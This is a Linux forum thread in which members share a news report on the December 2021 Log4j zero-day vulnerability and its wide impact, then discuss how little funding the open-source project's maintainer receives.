The officially official Devuan Forum!

You are not logged in.

#1 2021-12-12 07:48:46

hevidevi
Member
Registered: 2021-09-17
Posts: 225  

Extremely Critical Log4J Vulnerability....

... Leaves Much of the Internet at Risk

One to keep an eye on!

2021-12-10 21:29
The Apache Software Foundation has released fixes to contain an actively exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.

Log4j is used as a logging package in a variety of different popular software by a number of manufacturers, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft.

"The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year," said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys.

"Log4j is a ubiquitous library used by millions of Java applications for logging error messages. This vulnerability is trivial to exploit."

Web infrastructure company Cloudflare noted that it blocked roughly 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with most of the exploitation attempts originating from Canada, the U.S., Netherlands, France, and the U.K. Given the ease of exploitation and prevalence of Log4j in enterprise IT and DevOps, in-the-wild attacks aimed at susceptible servers are expected to ramp up in the coming days, making it imperative to address the flaw immediately.

"This Log4j vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string," Security expert Marcus Hutchins said in a tweet.

https://thehackernews.com/2021/12/extre … ility.html

Last edited by hevidevi (2021-12-12 07:50:49)

Offline

#2 2021-12-12 08:43:58

Head_on_a_Stick
Member
From: London
Registered: 2019-03-24
Posts: 2,326  

Re: Extremely Critical Log4J Vulnerability....

Relevant:

dependency.png

The Log4j library is maintained by Ralph Goers who, up until this vulnerability, had a grand total of three donors for their project. Shameful.

See also https://ariadne.space/2021/12/11/to-sec … y-fund-it/

Last edited by Head_on_a_Stick (2021-12-12 08:45:49)


To obtain a root shell use su -. Using just su will result in "command not found" messages.

Offline

#3 2021-12-12 10:36:10

hevidevi
Member
Registered: 2021-09-17
Posts: 225  

Re: Extremely Critical Log4J Vulnerability....

Yeah pretty shameful hoas when this piece of software is used in over 3 billion devices or some such so ive read from the twitter page ariadne shared.

log4shell.jpg

Offline

Board footer